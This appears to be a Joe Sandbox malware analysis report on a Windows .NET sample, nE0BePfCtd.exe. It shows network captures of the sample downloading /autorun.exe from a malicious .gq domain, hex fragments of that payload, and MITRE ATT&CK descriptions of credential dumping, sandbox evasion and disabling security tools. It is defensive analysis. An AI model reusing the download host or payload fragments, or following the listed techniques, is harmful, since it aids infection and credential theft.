Aug 24, 2021 19:40:14.560178995 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:14.604619980 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:15.095716000 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:15.127790928 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:18.631531954 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:18.663662910 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:19.321356058 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:19.356414080 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:19.802139997 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:19.834327936 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:20.590341091 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:20.617953062 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:21.519418001 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:21.547194004 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:22.344873905 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:22.369231939 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:23.175256014 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:23.210340977 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:24.259001017 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:24.307009935 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:24.968296051 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:25.003935099 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 24, 2021 19:40:26.256227970 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:40:26.299206972 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 24, 2021 19:41:02.900485039 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:41:02.949367046 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 24, 2021 19:41:04.205465078 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 24, 2021 19:41:04.247378111 CEST	53	50540	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 24, 2021 19:39:24.645962954 CEST	192.168.2.3	8.8.8.8	0x98bd	Standard query (0)	swretjhwrtj.gq	A (IP address)	IN (0x0001)
Aug 24, 2021 19:39:33.427870035 CEST	192.168.2.3	8.8.8.8	0xdef	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 24, 2021 19:39:33.474956989 CEST	192.168.2.3	8.8.8.8	0x3c46	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 24, 2021 19:39:24.742316008 CEST	8.8.8.8	192.168.2.3	0x98bd	No error (0)	swretjhwrtj.gq		172.67.216.236	A (IP address)	IN (0x0001)
Aug 24, 2021 19:39:24.742316008 CEST	8.8.8.8	192.168.2.3	0x98bd	No error (0)	swretjhwrtj.gq		104.21.86.82	A (IP address)	IN (0x0001)
Aug 24, 2021 19:39:33.465048075 CEST	8.8.8.8	192.168.2.3	0xdef	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 19:39:33.513570070 CEST	8.8.8.8	192.168.2.3	0x3c46	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

swretjhwrtj.gq

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49707	172.67.216.236	80	C:\Users\user\Desktop\nE0BePfCtd.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 19:39:24.783632994 CEST	1050	OUT	GET /autorun.exe HTTP/1.1 Host: swretjhwrtj.gq Connection: Keep-Alive
Aug 24, 2021 19:39:24.818221092 CEST	1051	IN	HTTP/1.1 200 OK Date: Tue, 24 Aug 2021 17:39:24 GMT Content-Type: application/x-msdos-program Content-Length: 216064 Connection: keep-alive last-modified: Tue, 24 Aug 2021 13:47:07 GMT etag: "34c00-5ca4e5e9adae0" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 3854 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J8tKHgxTth4ePxaHOYf4JpqFuX3NiTWLO9XuY6WbWQ%2BVjQfXj9xCiloYmLgIeO7yT1P%2BkYDW3qK92Lz6X%2BbKHtUlnLsGvy0nClUqgP0hIov8iDEEG0j%2FPNiNXTq6lhrZsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683e5c1fe8c64a92-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9b 36 d3 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 01 00 00 ac 01 00 00 00 00 00 d6 a6 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 a6 01 00 4f 00 00 00 00 c0 01 00 b4 a5 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 68 a6 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 98 01 00 00 20 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 a5 01 00 00 c0 01 00 00 a8 01 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 04 00 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL60 @ @Oh H.text `.rsrc@@.relocH@B
Aug 24, 2021 19:39:24.818284035 CEST	1053	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Aug 24, 2021 19:39:24.818305969 CEST	1054	IN	Data Raw: 02 00 00 00 9b 00 00 00 21 02 00 00 bc 02 00 00 0e 00 00 00 00 00 00 00 02 00 00 00 31 00 00 00 a6 02 00 00 d7 02 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 dd 02 00 00 e3 02 00 00 03 00 00 00 0a 00 00 01 1b 30 04 00 7c 01 00 00 02 00 Data Ascii: !10\|s7R%(s(8(9-G(sosR%(so&8s?oo:o:o
Aug 24, 2021 19:39:24.818326950 CEST	1055	IN	Data Raw: 04 28 1e 00 00 0a 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2d 07 06 0d dd 32 01 00 00 02 28 08 00 00 06 0c 73 e8 00 00 06 13 04 11 04 07 6f e1 00 00 06 73 a3 00 00 06 13 05 11 05 1e 8d 52 00 00 01 25 d0 a7 00 00 04 28 1e 00 00 0a 73 1f Data Ascii: (s(8(9-2(sosR%(so&8R%(soo:R%(so?-R%(so?,(sR%(s
Aug 24, 2021 19:39:24.818350077 CEST	1057	IN	Data Raw: 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2d 2e 09 17 58 0d 38 57 ff ff ff 09 19 40 50 ff ff ff 02 1f 0f 8d 52 00 00 01 25 d0 df 00 00 04 28 1e 00 00 0a 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2c 30 73 e8 00 00 06 13 04 07 28 52 00 Data Ascii: (8(9-.X8W@PR%(s(8(9,0s(R(+oo,o&&AL-81=0}s7R%(s
Aug 24, 2021 19:39:24.818367958 CEST	1058	IN	Data Raw: 00 00 41 64 00 00 02 00 00 00 7a 00 00 00 de 00 00 00 58 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 3d 00 00 00 2b 01 00 00 68 01 00 00 03 00 00 00 0a 00 00 01 02 00 00 00 31 00 00 00 47 01 00 00 78 01 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: AdzX=+h1Gx~0s>R%(s(8(9-sosR%(so&8as/R
Aug 24, 2021 19:39:24.818388939 CEST	1060	IN	Data Raw: 00 0a 2d 6e 11 0b 28 3b 00 00 0a 2d 65 28 61 00 00 0a 11 0a 28 4b 00 00 0a 6f 62 00 00 0a 13 0c 28 61 00 00 0a 11 0b 28 4b 00 00 0a 6f 62 00 00 0a 11 0c 17 14 28 23 00 00 06 13 0d 17 14 28 23 00 00 06 13 0e 11 0d 28 3b 00 00 0a 2d 24 11 0e 28 3b Data Ascii: -n(;-e(a(Kob(a(Kob(#(#(;-$(;-s?%o<%o>o=&Xi?Xi?&*A4"(c0?rop(n
Aug 24, 2021 19:39:24.818409920 CEST	1061	IN	Data Raw: 02 6f 70 00 00 0a 0a 06 6f 7d 00 00 0a 28 26 00 00 06 72 b0 03 00 70 7e 22 00 00 0a 6f 48 00 00 0a 2a 13 30 03 00 bd 00 00 00 18 00 00 11 7e 22 00 00 0a 0a 16 0b 38 a2 00 00 00 02 07 6f 7e 00 00 0a 25 1f 0f 5f 0c 1a 63 1f 0f 5f 0d 09 1f 09 31 1f Data Ascii: opo}(&rp~"oH0~"8o~%_c_1YAX(((,+(((,1YAX(((,+(((,Xo.X]-rp(,Xo?R0<
Aug 24, 2021 19:39:24.818432093 CEST	1062	IN	Data Raw: 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 01 00 00 04 03 6f fe 00 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 01 00 00 04 03 6f 08 01 00 06 0a de Data Ascii: 0{o&0{o&0{o&0{o&0{o&
Aug 24, 2021 19:39:24.818454027 CEST	1064	IN	Data Raw: 00 06 2d 03 16 2b 01 17 28 a2 00 00 0a 13 06 16 13 07 2b 56 11 06 11 07 9a 13 08 06 11 08 6f 25 00 00 0a 73 92 01 00 06 25 09 11 05 11 08 6f f4 00 00 06 6f 9c 01 00 06 25 09 6f f2 00 00 06 28 3b 00 00 0a 2d 08 09 6f f2 00 00 06 2b 07 11 05 6f e9 Data Ascii: -+(+Vo%s%oo%o(;-o+ooo&Xi2&o:\,o&Xi?&&*@aF. 0
Aug 24, 2021 19:39:24.819047928 CEST	1065	IN	Data Raw: 6f aa 00 00 0a 16 6a 3e 86 00 00 00 11 11 6f aa 00 00 0a 11 08 30 7b 07 20 00 00 20 03 6a 2f 72 11 11 6f 24 00 00 0a 6f 25 00 00 0a 17 8d 51 00 00 01 25 16 18 8d 52 00 00 01 25 16 1f 3a 9d 25 17 1f 5c 9d 73 1f 00 00 0a a2 17 6f 4e 00 00 0a 13 12 Data Ascii: oj>o0{ j/ro$o%Q%R%:%\soNo%s%,i0~"+o%oooX&o:I,o&o:D,o&*A

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: nE0BePfCtd.exe PID: 6404 Parent PID: 1736

General

Start time:	19:39:22
Start date:	24/08/2021
Path:	C:\Users\user\Desktop\nE0BePfCtd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\nE0BePfCtd.exe'
Imagebase:	0x5b0000
File size:	570880 bytes
MD5 hash:	24D513394EE068F066CCBD604F4F718A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report nE0BePfCtd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution